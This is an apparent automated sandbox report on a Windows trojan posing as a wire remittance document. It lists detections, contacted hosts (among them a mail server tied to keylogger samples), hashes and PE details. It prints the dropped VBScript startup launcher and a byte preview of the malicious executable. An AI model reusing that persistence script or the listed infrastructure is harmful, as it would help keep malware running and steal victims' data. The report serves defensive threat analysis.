                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Wire Remittance Detail.exe54%VirustotalBrowse
                    Wire Remittance Detail.exe55%ReversingLabsWin32.Trojan.Genie
                    Wire Remittance Detail.exe100%AviraTR/Dropper.Gen

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\AssemblyFullName.exe100%AviraTR/Dropper.Gen
                    C:\Users\user\AppData\Roaming\AssemblyFullName.exe54%VirustotalBrowse
                    C:\Users\user\AppData\Roaming\AssemblyFullName.exe55%ReversingLabsWin32.Trojan.Genie

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    No Antivirus matches

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    mail.iaa-airferight.com
                    		46.175.148.58
                    		truefalse
                      		high
                      api.ipify.org
                      		104.26.13.205
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.ipify.org/false
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://github.com/mgravell/protobuf-netWire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000415D000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000411F000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://api.ipify.orgWire Remittance Detail.exe, 00000000.00000002.1101766073.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1228824034.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1223807451.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.0000000004322000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2318499009.00000000029BC000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://github.com/mgravell/protobuf-netiWire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000415D000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000411F000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://stackoverflow.com/q/14436606/23354Wire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1083367719.0000000003041000.00000004.00000800.00020000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000415D000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1226380633.0000000003112000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000411F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://account.dyn.com/Wire Remittance Detail.exe, 00000000.00000002.1101766073.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1223807451.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.0000000004322000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://github.com/mgravell/protobuf-netJWire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000415D000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000411F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://api.ipify.org/tInstallUtil.exe, 00000002.00000002.1228824034.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2318499009.00000000029BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameWire Remittance Detail.exe, 00000000.00000002.1083367719.0000000003041000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1228824034.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1226380633.0000000003112000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2318499009.00000000029BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://stackoverflow.com/q/11564914/23354;Wire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000415D000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000411F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://stackoverflow.com/q/2152978/23354Wire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000415D000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000411F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://mail.iaa-airferight.comInstallUtil.exe, 00000002.00000002.1228824034.000000000312C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2318499009.0000000002A2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                46.175.148.58
                                                		mail.iaa-airferight.comUkraine
                                                		56394ASLAGIDKOM-NETUAfalse
                                                104.26.13.205
                                                		api.ipify.orgUnited States
                                                		13335CLOUDFLARENETUSfalse

                                                General Information

                                                Joe Sandbox version:42.0.0 Malachite
                                                Analysis ID:1635011
                                                Start date and time:2025-03-11 09:21:57 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 7m 30s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:16
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:Wire Remittance Detail.exe
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.expl.evad.winEXE@8/3@2/2
                                                EGA Information:
                                                • Successful, ratio: 75%
                                                HCA Information:
                                                • Successful, ratio: 97%
                                                • Number of executed functions: 188
                                                • Number of non-executed functions: 18
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 23.60.203.209, 172.202.163.200
                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target Wire Remittance Detail.exe, PID 6892 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                04:22:59API Interceptor239x Sleep call for process: InstallUtil.exe modified
                                                09:22:57AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AssemblyFullName.vbs

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                46.175.148.58SecuriteInfo.com.Win32.CrypterX-gen.29823.5189.exeGet hashmaliciousAgentTeslaBrowse
                                                  pbgjw8i8N7.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    G3uJOLisBq.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      yxoY9FvULu.exeGet hashmaliciousAgentTeslaBrowse
                                                        ShGhJDcXXI.exeGet hashmaliciousAgentTeslaBrowse
                                                          wpo28029 Changzhou Tairun.exeGet hashmaliciousAgentTeslaBrowse
                                                            gcXBQbWQ1p.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              AmEZrFh7we.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                3SgC5vaFEg.exeGet hashmaliciousAgentTeslaBrowse
                                                                  SecuriteInfo.com.Win32.CrypterX-gen.27605.29739.exeGet hashmaliciousAgentTeslaBrowse
                                                                    104.26.13.205get_txt.ps1Get hashmaliciousLummaC StealerBrowse
                                                                    • api.ipify.org/
                                                                    XkgoE6Yb52.ps1Get hashmaliciousUnknownBrowse
                                                                    • api.ipify.org/
                                                                    R1TftmQpuQ.batGet hashmaliciousTargeted RansomwareBrowse
                                                                    • api.ipify.org/
                                                                    SpacesVoid Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                    • api.ipify.org/
                                                                    Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                    • api.ipify.org/
                                                                    BiXS3FRoLe.exeGet hashmaliciousTrojanRansomBrowse
                                                                    • api.ipify.org/
                                                                    lEUy79aLAW.exeGet hashmaliciousTrojanRansomBrowse
                                                                    • api.ipify.org/
                                                                    Simple1.exeGet hashmaliciousUnknownBrowse
                                                                    • api.ipify.org/
                                                                    2b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                                    • api.ipify.org/
                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                    • api.ipify.org/

                                                                    Domains

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    mail.iaa-airferight.comSecuriteInfo.com.Win32.CrypterX-gen.29823.5189.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 46.175.148.58
                                                                    pbgjw8i8N7.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 46.175.148.58
                                                                    G3uJOLisBq.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 46.175.148.58
                                                                    yxoY9FvULu.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 46.175.148.58
                                                                    ShGhJDcXXI.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 46.175.148.58
                                                                    wpo28029 Changzhou Tairun.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 46.175.148.58
                                                                    gcXBQbWQ1p.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 46.175.148.58
                                                                    AmEZrFh7we.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 46.175.148.58
                                                                    3SgC5vaFEg.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 46.175.148.58
                                                                    SecuriteInfo.com.Win32.CrypterX-gen.27605.29739.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 46.175.148.58
                                                                    api.ipify.orgTcSzPgyAqC1WEJQ.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 104.26.12.205
                                                                    y27AF4qx0Q.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 104.26.13.205
                                                                    nPqeSjgAQQ.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 104.26.13.205
                                                                    FORTUNE ALLIANCE VSL's DESCRIPTION.pdf.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 104.26.12.205
                                                                    MV RUN LONG VSL's DETAILS.pdf.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 104.26.12.205
                                                                    ynH9fYoMvM.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 172.67.74.152
                                                                    yxoY9FvULu.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 104.26.13.205
                                                                    IyaoiEZEqZ.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 172.67.74.152
                                                                    ShGhJDcXXI.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 172.67.74.152
                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                    • 104.26.12.205

                                                                    ASNs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    ASLAGIDKOM-NETUASecuriteInfo.com.Win32.CrypterX-gen.29823.5189.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 46.175.148.58
                                                                    pbgjw8i8N7.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 46.175.148.58
                                                                    G3uJOLisBq.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 46.175.148.58
                                                                    yxoY9FvULu.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 46.175.148.58
                                                                    ShGhJDcXXI.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 46.175.148.58
                                                                    wpo28029 Changzhou Tairun.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 46.175.148.58
                                                                    gcXBQbWQ1p.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 46.175.148.58
                                                                    AmEZrFh7we.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 46.175.148.58
                                                                    3SgC5vaFEg.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 46.175.148.58
                                                                    SecuriteInfo.com.Win32.CrypterX-gen.27605.29739.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 46.175.148.58
                                                                    CLOUDFLARENETUSkissingwithbestexperiencedgirlfriendonhereformenice.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                    • 104.21.80.1
                                                                    PO202503S.xlsmGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 104.21.112.1
                                                                    niceworkingskillwithbestideasevermade.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                    • 104.21.16.1
                                                                    QUOTATION_FEBQUOTE312025PDF.scr.exeGet hashmaliciousMSIL LoggerBrowse
                                                                    • 104.21.32.1
                                                                    P.Order request for quotations.exeGet hashmaliciousFormBookBrowse
                                                                    • 172.67.148.163
                                                                    PAYMENT COPY.exeGet hashmaliciousFormBookBrowse
                                                                    • 172.67.148.163
                                                                    Enquiry Quote - 21834-01.exeGet hashmaliciousFormBookBrowse
                                                                    • 188.114.96.3
                                                                    New Order RFQ- 19A20060.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 104.21.112.1
                                                                    EM#U0130R_7880330875661236965345096345789_3479653.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                    • 104.21.32.1
                                                                    kcDXTU4FJm.exeGet hashmaliciousLummaC StealerBrowse
                                                                    • 104.21.21.102

                                                                    JA3 Fingerprints

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    3b5074b1b5d032e5620f69f9f700ff0ePO202503S.xlsmGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 104.26.13.205
                                                                    RFQ - #10032025_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                    • 104.26.13.205
                                                                    U00b7pdf.vbsGet hashmaliciousUnknownBrowse
                                                                    • 104.26.13.205
                                                                    QUOTATION_FEBQUOTE312025PDF.scr.exeGet hashmaliciousMSIL LoggerBrowse
                                                                    • 104.26.13.205
                                                                    New Order RFQ- 19A20060.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 104.26.13.205
                                                                    SOLICITUD DE COTIZACI#U00d3N(UCU) 03-10-2025#U00b7pdf.vbsGet hashmaliciousUnknownBrowse
                                                                    • 104.26.13.205
                                                                    SOLICITUD DE COTIZACI#U00d3N(UCU) 03-10-2025#U00b7pdf.vbsGet hashmaliciousUnknownBrowse
                                                                    • 104.26.13.205
                                                                    ja811MqV4h.exeGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                    • 104.26.13.205
                                                                    SHIPPING ADVICE#2025.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 104.26.13.205
                                                                    BL-INVOICE DOCUMENTS.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 104.26.13.205

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Roaming\AssemblyFullName.exe

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\Wire Remittance Detail.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1129472
                                                                    Entropy (8bit):7.990608378291438
                                                                    Encrypted:true
                                                                    SSDEEP:24576:8E4cwG/FgJQfhA3D+Bwf6KLHPIlByEDT/MH1HoPw7rsecYjnTH:8EV5i2fy3Syvsk1+w7rsecYjT
                                                                    MD5:834A1E4418D9543BCBB76AA9BD15FECE
                                                                    SHA1:94D13721934655C477647509025346D1B7E93344
                                                                    SHA-256:4587101C910C2AF014B4F604C0BA76717C1C8B3F360CE0A191E81158B691F6CC
                                                                    SHA-512:79B8C266EE83540BA82DF58BE2B00A5B3D1CCE9E563AA842F9F22AF3177A0E429B69188EE637367B0C941C858D47856CCE51D4A8ED3738F0FA0C41524B1C3DCA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Virustotal, Detection: 54%, Browse
                                                                    • Antivirus: ReversingLabs, Detection: 55%
                                                                    Reputation:low
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................2..........>Q... ...`....@.. ....................................`..................................P..K....`............................................................................... ............... ..H............text...D1... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............:..............@..B................ Q......H........T..|E..........................................................*...(....*..0.......... ........8........E............8.....r...p(....rM..p(.... ....~....{t...9....& ....8........E........8.....V...& ....~....{7...:....& ....8........E........8......... ....~....{M...:X...& ....8M...*........%.Jo.7....&~.......*...~....*..(....*..0..h....... ........8........E................8......*(...... ....~....{}...9....& ....8.......o.... ....~....{E...9....& ....8........E...

                                                                    C:\Users\user\AppData\Roaming\AssemblyFullName.exe:Zone.Identifier

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\Wire Remittance Detail.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:modified
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:true
                                                                    Reputation:high, very likely benign file
                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AssemblyFullName.vbs

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\Wire Remittance Detail.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):90
                                                                    Entropy (8bit):4.843210913608063
                                                                    Encrypted:false
                                                                    SSDEEP:3:FER/n0eFHHoMEREaKC5/IpSmEudiHHn:FER/lFHIFiaZ5AiSin
                                                                    MD5:710A3AF77BD2476C230DFB2539CC2FB9
                                                                    SHA1:02DE77964F1E31F08625867AD6EC3959AE77F68C
                                                                    SHA-256:82F7C9C820962D953EF8168D01E96768926AAF840F1EA2430DA008683601E2F7
                                                                    SHA-512:9C8B792CCA038C89505ADB698AB60E0605E364F06797340A43DA359497AD165C166862CC54C35948132B48A4A9FE4D9FBFC0AFBFB7E0132BACF7C9F7A1E89D6E
                                                                    Malicious:true
                                                                    Reputation:low
                                                                    Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\AssemblyFullName.exe"""

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):7.990608378291438
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                    File name:Wire Remittance Detail.exe
                                                                    File size:1'129'472 bytes
                                                                    MD5:834a1e4418d9543bcbb76aa9bd15fece
                                                                    SHA1:94d13721934655c477647509025346d1b7e93344
                                                                    SHA256:4587101c910c2af014b4f604c0ba76717c1c8b3f360ce0a191e81158b691f6cc
                                                                    SHA512:79b8c266ee83540ba82df58be2b00a5b3d1cce9e563aa842f9f22af3177a0e429b69188ee637367b0c941c858d47856cce51d4a8ed3738f0fa0c41524b1c3dca
                                                                    SSDEEP:24576:8E4cwG/FgJQfhA3D+Bwf6KLHPIlByEDT/MH1HoPw7rsecYjnTH:8EV5i2fy3Syvsk1+w7rsecYjT
                                                                    TLSH:F1353315A349A3DED2402F7739F722218384768EEE08DB972E9B839F1127B54C474A5F
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................2..........>Q... ...`....@.. ....................................`................................

                                                                    File Icon

                                                                    Icon Hash:90cececece8e8eb0

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x51513e
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x67CFCDEB [Tue Mar 11 05:45:15 2025 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1150f00x4b.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1160000x5b8.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1180000xc.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x20000x1131440x113200ce684c8f7d0c4e16beb511649623697cFalse0.9869510662766924data7.992784525923971IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rsrc0x1160000x5b80x60097fbe641773f60299f445886ff826581False0.419921875data4.093206115147403IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
